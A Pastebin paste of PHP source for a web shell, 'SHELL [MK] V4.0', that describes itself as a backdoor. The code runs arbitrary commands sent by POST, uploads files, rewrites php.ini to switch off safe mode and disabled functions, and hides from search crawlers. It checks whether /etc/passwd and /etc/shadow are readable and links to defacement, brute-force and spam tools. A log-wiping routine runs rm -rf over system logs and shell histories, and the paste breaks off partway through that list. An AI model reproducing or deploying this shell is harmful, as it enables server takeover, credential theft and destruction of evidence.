cdw1p

SHELL [MK] V4.0 DECODER

Feb 1st, 2018
112
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?
  2. //////////              
  3. /////////   SHELL [MK] VERSION 4.0
  4. ////////    CREATED BY © MISTER KLIO
  5. ///////      ____     ____   __   __  
  6. //////      (    )   (    ) (  ) /  )
  7. /////       (  \  \_/  /  ) |  |/  /
  8. ////        (  )\  M  /(  ) |  K  (
  9. ///         (  ) \_  / (  ) |  |\  \
  10. //    SH3LL (__)       (__) (__) \__) V4.0
  11. /*                                 */// [ AZEDINEKYO@GMAIL.COM ] - [ FACEBOOK @IzzAdiine ]
  12. echo "<title>[MK] V4 | CONTROLE UR SERVER ".$_SERVER['HTTP_HOST']."</title>";
  13. ////////// REPORTING
  14. error_reporting(5);
  15. @ignore_user_abort(TRUE);
  16. @set_magic_quotes_runtime(0);
  17. ////////// SET TIME
  18. @set_time_limit(0);
  19. /////  HTTP_USER_AGENT
  20. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  21. $USERAGENTS = array("Twitter","Bing", "Yahoo", "Facebook", "Google", "MisterKlio","Yandex");
  22. if(preg_match('/MK/' . implode('|', $USERAGENTS) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  23. header('HTTP/1.0 404 NOT FOUND');
  24. exit; } }
  25. ///// DIR
  26. $Mister = $_POST['Mister']; $pwd = $_POST['pwd']; $DIR = $_POST['DIR'];
  27. if ($DIR == ''){ $DIR = getcwd(); }
  28. ///// PHP.INI
  29. if ($Mister == 'ini'){ $fp = fopen("php.ini","w+");
  30. fwrite($fp,"
  31. safe_mode = Off
  32. Safe_mode_gid = Off
  33. disable_functions = None
  34. disable_classes = None
  35. safe_mode_gid = Off
  36. open_basedir = Off
  37. allow_url_fopen = On
  38. "); }
  39. //////// PERMISSIONS  
  40. function getFilePermissions($FILE)
  41. { $perms = fileperms($FILE);
  42. if (($perms & 0xC000) == 0xC000) {
  43. //////// SOCKET
  44.  $info = 's';
  45. } elseif (($perms & 0xA000) == 0xA000) {
  46. ////////  SYMBOLIC LINK
  47.     $info = 'l';
  48. } elseif (($perms & 0x8000) == 0x8000) {
  49. ////////  REGULAR
  50.     $info = '-';
  51. } elseif (($perms & 0x6000) == 0x6000) {
  52. //////// BLOCK SPECIAL
  53.     $info = 'b';
  54. } elseif (($perms & 0x4000) == 0x4000) {
  55. //////// DIRECTORY
  56.     $info = 'd';
  57. } elseif (($perms & 0x2000) == 0x2000) {
  58. //////// CHARACTER SPECIAL
  59.     $info = 'c';
  60. } elseif (($perms & 0x1000) == 0x1000) {
  61. //////// FIFO PIPE
  62.     $info = 'p';
  63. } else {
  64. //////// UNKNOWN
  65.     $info = "u"; }
  66. //////// OWNER
  67. $info .= (($perms & 0x0100) ? 'r' : '-');
  68. $info .= (($perms & 0x0080) ? 'w' : '-');
  69. $info .= (($perms & 0x0040) ?
  70.             (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
  71. //////// GROUP
  72. $info .= (($perms & 0x0020) ? 'r' : '-');
  73. $info .= (($perms & 0x0010) ? 'w' : '-');
  74. $info .= (($perms & 0x0008) ?
  75.             (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
  76. //////// WORLD
  77. $info .= (($perms & 0x0004) ? 'r' : '-');
  78. $info .= (($perms & 0x0002) ? 'w' : '-');
  79. $info .= (($perms & 0x0001) ?
  80.  (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));
  81.  
  82.  return $info;}
  83.  
  84. ///// UP
  85. if (!empty ($_FILES['MKUP'])){
  86.     MOVE_UPLOADED_FILE($_FILES['MKUP']['tmp_name'],$DIR.'/'.$_FILES['MKUP']['name']);
  87.     $MK_TEXT = "<span style=' color:#0000F0;'><b>UPLOADED SUCCESSFULLY</b></span><br>FILE name : ".$_FILES['MKUP']['name']."<br>FILE SIZE : ".$_FILES['MKUP']['size']."<br>FILE TYPE : ".$_FILES['MKUP']['type']."<br>";}
  88. ///////// SECOND(S)
  89. $TIME = explode(' ', microtime());
  90. $startime = $TIME[1] + $TIME[0];
  91. function debuginfo() {
  92. global $startime;
  93. $TIME = explode(' ', microtime());
  94. $TOTALTIME = number_format(($TIME[1] + $TIME[0] - $startime), 2);
  95. echo ''.$TOTALTIME.' SECOND(S)';}
  96. ///// COMMAND
  97. function EXMISTER_K() {
  98.     $in=$_POST['COMMAND'];
  99. if (!$in == '') {
  100.     $MKOUT = '';
  101. if (function_exists('exec')) {
  102.         @exec($in,$MKOUT);
  103.         $MKOUT = @join("\n",$MKOUT);
  104. } elseif (function_exists('passthru')) {
  105.         ob_start();
  106.         @passthru($in);
  107.         $MKOUT = ob_get_clean();
  108. } elseif (function_exists('system')) {
  109.         ob_start();
  110.         @system($in);
  111.         $MKOUT = ob_get_clean();
  112. } elseif (function_exists('shell_exec')) {
  113.         $MKOUT = shell_exec($in);
  114. } elseif (is_resource($f = @popen($in,"r"))) {
  115.         $MKOUT = "";
  116. while(!@feof($f))
  117.             $MKOUT .= fread($f,1024);
  118.         pclose($f);}
  119. echo $MKOUT;}}
  120. function HIDMISTER_K () {
  121. //////// HOME
  122. echo "<!DOCTYPE html>
  123. <html><head><title>[MK] V3.2 | CONTROLE UR WEBSITE ".$_SERVER['HTTP_HOST']."</title>
  124. <meta charset='utf-8'> <meta name='robots' content='noindex, nofollow, noarchive'>";
  125. $CHARSET1 = "<meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'>";
  126. echo ''. $CHARSET1.'';
  127. ?>
  128. <link href='http://fonts.googleapis.com/css?family=Aldrich' rel='stylesheet' type='text/css'/>
  129.  
  130. <style media='screen'  rel='stylesheet' type='text/css'>
  131.  
  132. body,html {font-family :Aldrich;}
  133. body{
  134. background-color:#404040;
  135. padding:1px 1px;font-family: 'Aldrich', Tahoma, sans-serif;
  136. color:#0000F0;
  137. font-size:10px;
  138. font-weight: normal;
  139. font-style: normal;border-radius:2px;}
  140.  
  141. a  {text-decoration:none;font-size:10px;font-family: 'Aldrich', Tahoma, sans-serif;color:#FFFFFF;}
  142. a:hover {text-decoration:none;color:#000000;}
  143. span ,font,b , button{font-size:10px;font-family: 'Aldrich', Tahoma, sans-serif;}
  144.  
  145. li ,ul{font-size:10px;font-family: 'Aldrich', Tahoma, sans-serif;margin:0;padding:0;}ul.Mister-hmenu li {display: block;float: left; padding:0 2px;}
  146.  
  147. .activehome{
  148. -webkit-box-shadow: inset 0 0 0 1px rgba(0, 0, 0, 0.2), 0 0 6px rgba(0, 0, 0, 0.4);
  149. box-shadow: inset 0 0 0 1px rgba(0, 0, 0, 0.2), 0 0 6px rgba(0, 0, 0, 0.4);
  150. background: #0000F0;
  151. padding:0 20px;border-radius:2px;
  152. color:#FFFFFFF;
  153. }
  154.  
  155.  
  156. ul.Mister-hmenu li a {
  157. border-radius:2px;
  158. -webkit-box-shadow: inset 0 0 0 1px rgba(0, 0, 0, 0.2), 0 0 6px rgba(0, 0, 0, 0.4);
  159. box-shadow: inset 0 0 0 1px rgba(0, 0, 0, 0.2), 0 0 6px rgba(0, 0, 0, 0.4);
  160. background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));
  161. background:-webkit-linear-gradient(top, #505050, #383838);
  162. background:linear-gradient(to bottom, #505050, #383838);
  163. background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;
  164. padding:0 15px;margin:0 auto;position:relative;display:block;height:25px;
  165. cursor:pointer;color:#FFFFFF;line-height:24px;text-align: center;}
  166.  
  167. ul.Mister-hmenu>li>a:hover {
  168. color:#ffffff;
  169. background: #0000F0;
  170. }
  171.  
  172. .Mister-button{
  173. border-top: 2px solid #0000F0;
  174. font-size:10px;
  175. font-family: 'Aldrich', Tahoma, sans-serif;text-align: center;
  176. color: #FFFFFF;
  177. height:19px;
  178. border:2px solid rgba(0,0,0, 0.2);
  179. background: #0078FF;
  180. color: white;
  181. text-align: center;  
  182. text-decoration: none;  
  183. margin:0 auto;  
  184. border:1px solid #4D4D4D;
  185. text-decoration:none;
  186. border-radius:2px;
  187. border-bottom:3px solid #0000F0;}
  188. input.Mister-button ,button.Mister-button{
  189. background: #0078FF;
  190. }
  191. .Mister-button.active:hover {border-bottom:2px solid #000000;color: #FFFFFF !important;}
  192.  
  193. .Mister-button.hover, .Mister-button:hover{
  194. border-bottom:2px solid #000000;
  195. background: -webkit-linear-gradient(top, #FFFFFF 0, #BFBFBF 100%) no-repeat;
  196. }
  197. .Mister-button.hover, .Mister-button:hover {color: #FFFFFF !important;}
  198. input[type='text'], input[type='password'], input[type='email'], input[type='url'], input[type='text'], input[type='password'], input[type='email'], input[type='url'], textarea {
  199. font-size:11px;
  200. border:1px solid #4D4D4D;width:100%;
  201. padding:3px;
  202. color:#0078FF;
  203. background: #383838;
  204. border :0px;
  205. border-radius:2px;
  206. -webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1), 0 1px rgba(255, 255, 255, 0.5);
  207. box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1), 0 1px rgba(255, 255, 255, 0.5);
  208. font-family: 'Aldrich', Tahoma, sans-serif;
  209. }
  210.  
  211. table ,area {border-radius:2px;outline:none;transition: all 0.20s ease-in-out;    -webkit-transition: all 0.25s ease-in-out;    -moz-transition: all 0.25s ease-in-out;        -webkit-    -moz-    border:1px solid rgba(0,0,0, 0.2);  font-family: 'Aldrich', Tahoma, sans-serif;}
  212.  
  213. select ,option {font-size:10px;font-family: 'Aldrich', Tahoma, sans-serif;
  214. color:#000000;
  215. background: -webkit-linear-gradient(top, #FFFFFF 0, #BFBFBF 100%) no-repeat;
  216. margin:0 auto;height:18px;border-radius:2px;
  217. -webkit-box-shadow: inset 0 1px rgba(255, 255, 255, 0.3), inset 0 0 1px 1px rgba(255, 255, 255, 0.1), 0 2px 10px rgba(0, 0, 0, 0.5);}
  218. textarea {
  219. border-radius:2px;
  220. height:200px; -webkit-color:#0000F0;background:-webkit-linear-gradient(top, #000000 0, #404040 100%) no-repeat;  font-family: 'Aldrich', Tahoma, sans-serif; font-size:10px;}
  221.  
  222. th{border-radius:2px;
  223. height:20px;
  224. background: #000000;}
  225. tr:hover{
  226. background:#0000F0;border-radius:2px;
  227. }
  228. td,th{border-radius:2px;border-bottom:1px solid #000000;font-size:10px; font-family: 'Aldrich', Tahoma, sans-serif;margin:0;vertical-align:top;color:#e1e1e1; }h1{ border-left:5px solid #0000F0;padding: 2px 5px;font-size:10px;background-color:#222;margin:0px; }div.content{font-size:10px; padding: 4px;margin-left:5px;background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838)background:linear-gradient(to bottom, #505050, #383838);background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;margin:0 auto;}.Mister-headline { display:inline-block; position:absolute; min-width:50px;top:12px;left:5.10%;font-size:18px;font-family: 'Aldrich', Tahoma, sans-serif;color:#0000F0;}.Mister-slogan {font-size:10px;display: inline-block;  position: absolute;  top: 35px;  left: 5.89%;margin-left: -9px;  font-family: 'Aldrich', Tahoma, sans-serif;color: white ;}
  229.  
  230. .Mister-header{border-bottom:2px solid #444444;
  231. border-top:3px solid #0000F0;
  232. margin:0 auto;
  233. background-repeat:no-repeat;
  234. height:60px;
  235. background-image:url();
  236. background-position: center top;
  237. position: relative;
  238. z-index: auto;}
  239.  
  240. .Mister-nav:after {border-radius:2px;-webkit-box-shadow: inset 0 1px rgba(255, 255, 255, 0.3), inset 0 0 1px 1px rgba(255, 255, 255, 0.1), 0 2px 10px rgba(0, 0, 0, 0.5);  box-shadow: inset 0 1px rgba(255, 255, 255, 0.3), inset 0 0 1px 1px rgba(255, 255, 255, 0.1), 0 2px 10px rgba(0, 0, 0, 0.5);clear: both;display: block;content: ' '; }
  241. .Mister-nav {background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838);background:linear-gradient(to bottom, #505050, #383838);border-top:1px solid black;border-bottom:1px solid black;-webkit-box-shadow:inset 0 1px 0 #6e6e6e,0 2px 2px rgba(0,0,0,0.4);box-shadow:inset 0 1px 0 #6e6e6e,0 2px 2px rgba(0,0,0,0.4)border-bottom:3px solid black;border-top:1px solid black;margin:0 auto;position: relative;z-index: 499; }
  242. .dialog {width:100%;}
  243. .social {position: fixed;margin-top: 40;}
  244. .social ul {-webkit-transform: translate(-270px, 0);}
  245. .social ul li {display: block;width: 320px;text-align: right;padding: 5px;-webkit-transition: all 1s;background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838);background:linear-gradient(to bottom, #505050, #383838);border-bottom:2px solid #000000;}
  246. .social ul li:hover {-webkit-transform: translate(110px, 0);background: -webkit-linear-gradient(top, #4382EF 0, #1463EB 33%, #0C3B8D 100%) no-repeat;}
  247. .social ul li:hover a {color: #FFFFFF;}
  248. .MK-footer {background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838);background:linear-gradient(to bottom, #505050, #383838);background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;border-bottom:1px solid black;-webkit-box-shadow:inset 0 1px 0 #6e6e6e,0 2px 2px rgba(0,0,0,0.4);box-shadow:inset 0 1px 0 #6e6e6e,0 2px 2px rgba(0,0,0,0.4);border-bottom:4px solid #0000F0;font-size:10px;color:#FFFFFF;position:fixed; left:0px; right:0px; bottom:0px; text-align:center; border-top: 1px solid #0000F0; color:#FFFFFF;font-size:10px;}
  249. .MK-footer a {color:#0000F0;}
  250. .MK-Bouton ,button{color:#FFFFFF;font-size:10px;border: 0;border-collapse: separate;-webkit-background-origin: border ;-moz-background-origin: border ;background-origin: border-box ;background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838);background:linear-gradient(to bottom, #505050, #383838);padding:5px;margin:0 auto;height:25px;}
  251. </style>
  252. <?
  253. $LI = "<li>"; $IMGEDITED2 = '<img src="">';
  254. $BODY = '<body onLoad="init()" style="margin:0;table-layout:fixed;">';
  255. echo ''. $BODY .''; $HEADER = "<header class='Mister-header'>";
  256. echo "". $HEADER .""; $NAMES1 = "SHELL [MK] V4";
  257. $B1 = "<b class='Mister-headline'>"; echo "". $B1 .""; echo "". $NAMES1 ."</b>";
  258. $NAMS2 = "BACKDOR FOR THE NEW GENERATION";
  259. echo "<a class='Mister-slogan'>"; echo "". $NAMS2 ."</a></header>";
  260. $NAV3 = "<nav class='Mister-nav'>"; echo "". $NAV3 ."<div class='Mister-nav-inner'>";
  261. $UL1 = "<ul class='Mister-hmenu'>"; echo "". $UL1 ."<li>
  262. <a href='?Home' style='background: -webkit-linear-gradient(top, #FFFFFF 0, #BFBFBF 100%) no-repeat;color:#000000;'>";
  263. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  264. $COMMAND = "COMMAND"; echo "". $COMMAND ."</a></li>";
  265. echo "". $LI ."<a href='?Mister=FILES' class='active'>"; $FILEMANAGER = "FILE MANAGER";
  266. echo "". $IMGEDITED2 .""; echo "". $FILEMANAGER ."</a></li>";
  267. echo ''. $LI .'<a href="?Mister=SQLConnect">';
  268. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  269. $SQLCONNECT = "SQL CONNECT"; echo''. $SQLCONNECT .'</a></li>';
  270. echo ''. $LI .'<a href="?Mister=Mass">';
  271. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  272. $MASSAUTODEFACER = 'MASS AUTO DEFACER'; echo''. $MASSAUTODEFACER .'</a></li>';
  273. echo ''. $LI .'<a href="?Mister=Zoneh">';
  274. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  275. echo'ZONE-H AUTO POSTER</a></li>';
  276. echo ''. $LI .'<a href="?Mister=read">';
  277. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  278. echo'READ /ETC/PASSWD</a></li>';
  279. echo ''. $LI .'<a href="?Mister=string">';
  280. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  281. echo'STRING TOOLS</a></li>';
  282. echo ''. $LI .'<a href="?Mister=cpanelBrut">';
  283. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  284. echo'CPANNELS / BRUTE FORCE</a></li>';
  285. echo ''. $LI .'<a href="?Mister=Bypassuser">';
  286. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  287. echo'ALL BYPASS</a></li>';
  288. echo ''. $LI .'<a href="?Mister=FinderAdmin">';
  289. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  290. echo'TOOLS OF HACKING</a></li>';
  291. echo ''. $LI .'<a href="?Mister=Mails">';
  292. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  293. echo'TOOLS OF SPAMMING</a></li>';
  294. //// LOGS
  295. echo ''. $LI .'<a href="?Mister=DELLOGS">';
  296. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  297. $LOGS = "DELET LOGS"; echo ''. $LOGS .'</a></li>';
  298. //// END
  299. echo ''. $LI .'<a href="?Mister=infoserv">';
  300. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  301. $SAFEMODES = "SAFE MODES"; echo ''. $SAFEMODES .'</a></li>';
  302. eval("?>".base64_decode("PGxpPjxhIGhyZWY9Jz9NaXN0ZXI9S2lsbGluZyc+PHNwYW4gc3R5bGU9J2ZvbnQtc2l6ZToxM3B4OyBmb250LWZhbWlseTpOYXJraXNpbTsgY29sb3I6I2Y2MDAwMCc+4pyYPC9zcGFuPiBSRU1PVkUgU0hFTEw8L2E+PC9saT4=/"));
  303. echo'</nav><nav class="Mister-nav" cellspacing="3" style="
  304. background:#0000F0;
  305. ">';
  306. $TABLE011  = '<table Style="width:100%;" cellspacing=2><td><span style="float:right">'; echo ''. $TABLE011 .'';
  307. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  308. $BNAMESHELL = '<b style="color:#000000;"> NAME SHELL : </b>'; echo ''. $BNAMESHELL .'<span style="color:#FFFFFF">SH3LL MK VERSION 3.2.0</span><br>';
  309. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  310. $BALLDRIVE = "<b style='color:#000000;'> ALL DRIVERS : </b>"; echo ''. $BALLDRIVE .'<span style="color:#FFFFFF">';
  311. //// DRIVERS
  312. explode("\\",$d);$v = $v[0];
  313. foreach (range("A","Z") as $DRIVERS) {$bool = @IS_DIR($DRIVERS.":\\");
  314. if ($bool){$DRIVER .= "<a href='?Mister=FILES&DIR=".$DRIVERS.":\'>[ ";
  315. if ($DRIVERS.":" != $v){$DRIVER .= $DRIVERS;}
  316. else {$DRIVER .= "<span>".$DRIVERS."</span>";} $DRIVER .= " ]</a> ";}}
  317. echo "". $DRIVER ."</span><br>";
  318. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  319. $WEBSERVER = "<b style='color:#000000;'> WEB SERVER : </b>"; echo ''. $WEBSERVER .'<span style="color:#FFFFFF">';
  320. echo $_SERVER["SERVER_SOFTWARE"]; echo '</span><br>';
  321. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  322. $ADMINSERV = "<b style='color:#000000;'> ADMIN SERVER : </b>"; echo ''. $ADMINSERV .'<span style="color:#FFFFFF">';
  323. echo $_SERVER['SERVER_ADMIN']; echo '</span><br>';
  324. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  325. $READABLEETC = "<b style='color:#000000;'> READABLE /ETC/PASSWD : </b>"; echo ''. $READABLEETC .'';
  326. echo @IS_READABLE('/etc/passwd')?"READABLE <a href='?Mister=read'> [VIEW]</a>":"NOT_READABLE"; echo "<br>";
  327. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  328. $SHADOW = "<b style='color:#000000;'> READABLE /ETC/SHADOW : </b>"; echo ''. $SHADOW .'';
  329. echo @IS_READABLE('/etc/shadow')?"READABLE <a href='?Mister=read'> [VIEW]</a>":"NOT_READABLE";
  330. echo '<br></span><span style="right;">';
  331. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  332. $KERNEL = "<b style='color:#000000;'> KERNEL : </b>"; echo ''. $KERNEL .'<span style="color:#FFFFFF">';
  333.  echo php_uname(); echo '</span><br>';
  334. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  335. $DRIVEROPEN = "<b style='color:#000000;'> DRIVER OPEN : </b>"; echo ''. $DRIVEROPEN .'<span style="color:#FFFFFF">';
  336. if(isset($_GET['path'])){
  337. $DIR = $_GET['path'];
  338. }else{
  339. $DIR = getcwd();
  340. }
  341. $DIR = str_replace('\\','/',$DIR);
  342. $paths = explode('/',$DIR);
  343.  
  344. foreach($paths as $id=>$pwd){
  345. if($pwd == '' && $id == 0){
  346. $a = true;
  347. echo '<a href="?Mister=FILES&DIR=/">/</a>';
  348. continue;
  349. }
  350. if($pwd == '') continue;
  351. echo '<a href="?Mister=FILES&DIR=';
  352. for($i=0;$i<=$id;$i++){
  353. echo "$paths[$i]";
  354. if($i != $id) echo "/";
  355. }
  356. echo '">'.$pwd.'</a>/';
  357. } echo '</span><br>';
  358. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  359. $SYSTEM = "<b style='color:#000000;'> SYSTEM : </b>"; echo ''. $SYSTEM .'';
  360. echo "<span style='color:#FFFFFF;'>".@getmyuid()."(".@get_current_user().") - uid=".@getmyuid()." (".@get_current_user().") gid=".@getmygid()."(".@get_current_user().")";echo '</span><br>';
  361. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  362. function formatSizeUnits($bytes){if ($bytes >= 1073741824){$bytes = number_format($bytes / 1073741824, 2) . ' GB';}
  363. elseif ($bytes >= 1048576){$bytes = number_format($bytes / 1048576, 2) . ' MB';}
  364. elseif ($bytes >= 1024){$bytes = number_format($bytes / 1024, 2) . ' KB';}
  365. elseif ($bytes > 1){$bytes = $bytes . ' Bytes';}
  366. elseif ($bytes == 1){$bytes = $bytes . ' Byte';}
  367. else{$bytes = '0 Bytes';}return $bytes;}
  368. $Toplamalan = formatSizeUnits(disk_total_space("/"));
  369. $Freealan = formatSizeUnits(disk_free_space("/"));
  370. $alaNOran = round(disk_free_space("/") * 100 / disk_total_space("/")); echo "<span style='color:#FFFFFF'>";
  371. $TOTAL3 = "<b style='color:#000000;'> TOTAL : </span></b>"; echo ''. $TOTAL3 .''; echo "". $Toplamalan ."";
  372. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  373. echo "<span style='color:#FFFFFF'>";
  374. $FREESPACE = "<b style='color:#000000;'> FREE : </span></b>"; echo ''. $FREESPACE .''; echo "". $Freealan .""; echo '</span>';
  375. echo '<br>';
  376. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  377. $PORT3 = "<b style='color:#000000;'> PORT : </b>"; echo ''. $PORT3 .'<span style="color:#FFFFFF">';
  378. echo $_SERVER['SERVER_PORT'];  echo '</span>';
  379. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  380. $USERID = "<b style='color:#000000;'> USER ID : </b>"; echo ''. $USERID .'<span style="color:#FFFFFF">';
  381. echo getmyuid(); echo '</span>';
  382. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  383. $CURRENTUSER = "<b style='color:#000000;'> CURRENT USER : </b>"; echo ''. $CURRENTUSER .'<span style="color:#FFFFFF">';
  384. echo get_current_user(); echo '</span><br>';
  385. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  386. $TIMEDATES = "<b style='color:#000000;'> TIME & DATE : </b>"; echo ''. $TIMEDATES .'<span style="color:#FFFFFF">';
  387. /// DATE / TIME / DAY
  388. $DATE = date (" F/j/Y/ "); $TIME = date ("g:i A"); $DAY = date ("l");
  389. echo ''. $DATE .''; echo ' | '. $TIME .''; echo ' | '. $DAY .'</span>';
  390. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  391. $LOADING =  "<b style='color:#000000;'> LOADING IN : </b>"; echo ''. $LOADING .'<span style="color:#FFFFFF">';
  392. debuginfo();ob_end_flush(); echo "</span></td></tr></table></nav></head>";}
  393. //// COMMAND
  394. function FOTMISTER_K($MK_TEXT,$MK_TEXT1,$DIR) {
  395. echo "</textarea><br><br><form method='POST'>
  396. <center><b>&check; COMMAND : </b><input type='text' name='COMMAND' style='width:40%' value='DIR /s /w /b *config*.php'><input type='submit' class='Mister-button' value='DONE'></center></form>";}
  397. ///// END
  398. //////////////////////////////// TOOLS NOT FOR KIDS  ///////////////////////////////////////
  399. function MISTERMISTER_K () {
  400. $MISTER_K_Mister = $_GET['Mister'];
  401. /////// BACK CONNECT PERL
  402.  
  403. /////// DELET LOGS
  404. if ($_GET['Mister'] == 'DELLOGS') {
  405. error_reporting(E_ERROR | E_PARSE);
  406. @ini_set("max_execution_time",0);
  407. @set_time_limit(0);
  408. echo "<br><nav class='Mister-nav'><center><span style='font-size:18px;color:#0000F0;'>LOGS ECRASED</span></nav><center><br><div class=content>";
  409. echo "<table style='margin: 0 auto;'>";
  410. exec("/logs/access.log");
  411. exec("/logs/error.log");
  412. exec("rm -rf /Apache2.2/logs/access.log");
  413. exec("rm -rf /Apache2.2/logs/error.log");
  414. exec("rm -rf /tmp/logs");
  415. exec("rm -rf /root/.ksh_history");
  416. exec("rm -rf /root/.bash_history");
  417. exec("rm -rf /root/.bash_logout");
  418. exec("rm -rf /usr/local/apache/logs");
  419. exec("rm -rf /usr/local/apache/log");
  420. exec("rm -rf /var/apache/logs");
  421. exec("rm -rf /var/apache/log");
  422. exec("rm -rf /var/run/utmp");
  423. exec("rm -rf /var/logs");
  424. exec("rm -rf /var/log");
  425. exec("rm -rf /var/adm");
  426. exec("rm -rf /etc/wtmp");
  427. exec("rm -rf /etc/utmp");
  428. exec("rm -rf $HISTFILE");
  429. exec("rm -rf /var/log/lastlog");
  430. exec("rm -rf /var/log/wtmp");
  431. //SHELL_EXEC
  432. shell_exec("/logs/access.log");
  433. shell_exec("/logs/error.log");
  434. shell_exec("rm -rf /Apache2.2/logs/access.log");
  435. shell_exec("rm -rf /Apache2.2/logs/error.log");
  436. shell_exec("rm -rf /tmp/logs");
  437. shell_exec("rm -rf /root/.ksh_history");
  438. shell_exec("rm -rf /root/.bash_history");
  439. shell_exec("rm -rf /root/.bash_logout");
  440. shell_exec("rm -rf /usr/local/apache/logs");
  441. shell_exec("rm -rf /usr/local/apache/log");
  442. shell_exec("rm -rf /var/apache/logs");
  443. shell_exec("rm -rf /var/apache/log");
  444. shell_exec("rm -rf /var/run/utmp");
  445. shell_exec("rm -rf /var/logs");
  446. shell_exec("rm -rf /var/log");
  447. shell_exec("rm -rf /var/adm");
  448. shell_exec("rm -rf /etc/wtmp");
  449. shell_exec("rm -rf /etc/utmp");
  450. shell_exec("rm -rf $HISTFILE");
  451. shell_exec("rm -rf /var/log/lastlog");
  452. shell_exec("rm -rf /var/log/wtmp");
  453. //PASSTHRU
  454. passthru("/logs/access.log");
  455. passthru("/logs/error.log");
  456. passthru("rm -rf /Apache2.2/logs/access.log");
  457. passthru("rm -rf /Apache2.2/logs/error.log");
  458. passthru("rm -rf /tmp/logs");
  459. passthru("rm -rf /root/.ksh_history");
  460. passthru("rm -rf /root/.bash_history");
  461. passthru("rm -rf /root/.bash_logout");
  462. passthru("rm -rf /usr/local/apache/logs");
